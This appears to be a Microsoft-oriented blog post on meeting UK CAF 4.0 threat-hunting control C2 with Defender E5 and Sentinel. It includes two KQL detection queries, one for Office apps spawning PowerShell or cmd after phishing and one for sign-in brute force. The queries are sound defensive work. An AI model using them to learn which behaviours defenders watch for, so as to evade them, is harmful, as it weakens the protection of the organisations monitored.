Microsoft E5 elevates threat hunting from reactive investigation to a structured, intelligence-driven discipline, a defining feature of Achieved maturity under CAF 4.0 C2.

Distinctive E5 capabilities for C2:

Hypothesis-driven hunts at scale: Defender Advanced Hunting (KQL) enables analysts to test hypotheses across correlated telemetry from endpoints, identities, email, and SaaS applications. This supports hunts focused on adversary TTPs, not just atomic IoCs, as CAF requires (a worked sketch follows at the end of this section).

Turning hunts into detections: Custom hunting queries can be converted into alert rules, operationalizing findings into automated detection and reducing reliance on manual triage.

Threat intelligence integration: Microsoft Threat Intelligence feeds real-time actor tradecraft and sector-specific campaigns into the hunting workflow, ensuring hunts anticipate emerging threats rather than react to incidents.

Identity and lateral movement focus: Defender for Identity surfaces Kerberos abuse, credential replay, and lateral movement patterns, enabling hunts that span beyond endpoints and email.

Documented and repeatable process: E5 supports recording hunt queries and outcomes via APIs and portals, creating evidence for audits and driving continuous improvement, a CAF expectation.

By embedding hypothesis-driven hunts, automation, and intelligence into business-as-usual operations, E5 helps public sector organizations meet CAF C2's requirement for regular, documented hunts that proactively reduce risk and evolve with the threat landscape.
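To make the hypothesis-driven approach concrete, here is a minimal sketch of an Advanced Hunting query. The hypothesis: users who recently received phishing mail now show Office applications spawning script interpreters on their devices. Table and column names follow the standard Defender Advanced Hunting schema; the time windows and process lists are illustrative assumptions to tune for your estate.

```kusto
// Hypothesis (MITRE ATT&CK T1566 phishing leading to T1059 scripting):
// recipients of detected phishing whose devices then show Office apps
// launching PowerShell, cmd, or wscript.
let suspectRecipients =
    EmailEvents
    | where Timestamp > ago(7d)
    | where ThreatTypes has "Phish"
    | project Recipient = tolower(RecipientEmailAddress)
    | distinct Recipient;
DeviceProcessEvents
| where Timestamp > ago(7d)
| where InitiatingProcessFileName in~ ("winword.exe", "excel.exe", "outlook.exe")
| where FileName in~ ("powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe")
| where tolower(AccountUpn) in (suspectRecipients)
| project Timestamp, DeviceName, AccountUpn,
          InitiatingProcessFileName, FileName, ProcessCommandLine
| order by Timestamp desc
```

A query like this can then be saved as a custom detection rule, which is exactly the "turning hunts into detections" step described above: the hunt's hypothesis, query, and outcome become documented, repeatable artefacts.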
Sentinel

Microsoft Sentinel takes threat hunting beyond the Microsoft ecosystem, unifying telemetry from endpoints, firewalls, OT systems, and third-party SaaS into a single cloud-native SIEM and SOAR platform. This consolidation helps enable hunts that span the entire attack surface, a critical step toward Achieved maturity under CAF 4.0 C2.

Key capabilities for control C2:

Attacker-centric analysis: MITRE ATT&CK-aligned analytics and KQL-based hunting allow teams to identify stealthy behaviours, simulate breach paths, and validate detection coverage (see the closing sketch at the end of this post).

Threat intelligence integration: Sentinel enriches hunts with national and sector-specific intelligence (e.g., NCSC advisories), ensuring hunts target the most relevant TTPs.

Automation and repeatability: SOAR playbooks convert post-hunt findings into automated workflows for containment, investigation, and documentation, meeting CAF's requirement for structured, continuously improving hunts.

Evidence-driven improvement: Recorded hunts and automated reporting create a feedback loop that strengthens posture and demonstrates compliance.

By combining telemetry, intelligence, and automation, Sentinel helps organizations embed threat hunting as a routine, scalable process, turning insights into detections and ensuring hunts evolve with the threat landscape. The video below shows how E3, E5, and Sentinel power real C2 threat hunts.

Bringing it all Together

By progressing from E3's reactive investigation, through E5's intelligence-led correlation, to Sentinel's automated hunting and orchestration, organizations can develop an end-to-end capability that not only detects threats but anticipates them, helping prevent disruption to essential public services across the UK. This is the operational reality of Achieved under CAF 4.0 C2 (Threat Hunting): a structured, data-driven, intelligence-informed approach that transforms threat hunting from an isolated task into an ongoing discipline of proactive defence.

To demonstrate what effective, CAF-aligned threat hunting looks like, the following one-slider and demo walk through how Microsoft's security tools support structured, repeatable hunts that match organizational risk. These examples help translate C2's expectations into practical, operational activity.

CAF 4.0 challenges public sector defenders to move beyond detection and embrace anticipation. How mature is your organization's ability to uncover the threats that have not yet been seen? In this final post of the series, the message is clear: true cyber resilience moves beyond reactivity towards a predictive approach.
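As a closing companion to the demo, here is the cross-source sketch referenced above: a minimal example of the kind of hunt only a consolidated platform can run, correlating Entra ID sign-in failures with third-party firewall telemetry. SigninLogs and CommonSecurityLog are standard Sentinel tables; the failure threshold and the firewall action strings are illustrative assumptions that vary by vendor and estate.

```kusto
// Closing sketch (MITRE ATT&CK T1110, Brute Force): source IPs generating
// many failed Entra ID sign-ins that also appear as permitted inbound
// traffic in third-party firewall logs. Tune the threshold to your estate;
// DeviceAction strings differ between firewall vendors.
let noisyIPs =
    SigninLogs
    | where TimeGenerated > ago(1d)
    | where ResultType != "0"                    // any sign-in failure code
    | summarize Failures = count() by IPAddress, UserPrincipalName
    | where Failures > 20;
noisyIPs
| join kind=inner (
    CommonSecurityLog
    | where TimeGenerated > ago(1d)
    | where DeviceAction !in ("deny", "drop")    // vendor-specific values
    | project SourceIP, DestinationIP, DestinationPort
  ) on $left.IPAddress == $right.SourceIP
| project UserPrincipalName, IPAddress, Failures, DestinationIP, DestinationPort
| order by Failures desc
```

From a hit here, a SOAR playbook can block the IP, open an incident, and record the hunt's outcome automatically, turning a one-off query into the repeatable, documented process CAF C2 expects.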